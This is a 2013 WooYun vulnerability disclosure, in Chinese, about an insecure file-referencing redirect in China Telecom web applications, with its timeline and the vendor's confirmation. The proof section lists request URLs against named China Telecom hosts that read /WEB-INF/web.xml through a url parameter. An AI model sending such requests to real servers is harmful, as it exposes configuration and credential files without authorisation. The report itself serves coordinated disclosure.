当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-020534

漏洞标题:中国电信的应用某功能不安全实现!

相关厂商:中国电信

漏洞作者: 乌云公益

提交时间:2013-03-23 16:41

修复时间:2013-05-07 16:42

公开时间:2013-05-07 16:42

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:1

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-23: 细节已通知厂商并且等待厂商处理中
2013-03-27: 厂商已经确认,细节仅向厂商公开
2013-04-06: 细节向核心白帽子及相关领域专家公开
2013-04-16: 细节向普通白帽子公开
2013-04-26: 细节向实习白帽子公开
2013-05-07: 细节向公众公开

简要描述:

RT!

详细说明:

应用转向功能,不安全引用实现,导致缺陷!

漏洞证明:

目前发现的例子来看,可能大量门户及应用存在此问题(因为这是个不良的开发习惯产生的安全问题,如果没有安全开发标准的支持纠正这个恶习,它随时还是会发生!):
http://netreport.sh.ct10000.com/default.jsp?url=/WEB-INF/web.xml


1.png


http://jx.189.cn/notice/notice_detail_file.jsp?url=/WEB-INF/web.xml
http://jx.ct10000.com/notice/notice_detail_file.jsp?url=/WEB-INF/web.xml


2.png


3.png


危害性不好说,把这截图给这个应用的开发者或懂点j2ee的安全人员看看,觉得重要就修复吧!如图:

456.png


修复方案:

参见这篇简述:http://zone.wooyun.org/content/3012
其他应用,自己查看吧,又免费给中国电信做安全了!

版权声明:转载请注明来源 乌云公益@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2013-03-27 23:02

厂商回复:

CNVD确认并复现所述情况,在学习zone上面的知识后未能进一步找到其他实例。已在24日转由CNCERT协调中国电信系统集成公司处置。
暂时未将安全目录传导到下一级,也未得到更敏感的配置文件,rank 8

最新状态:

暂无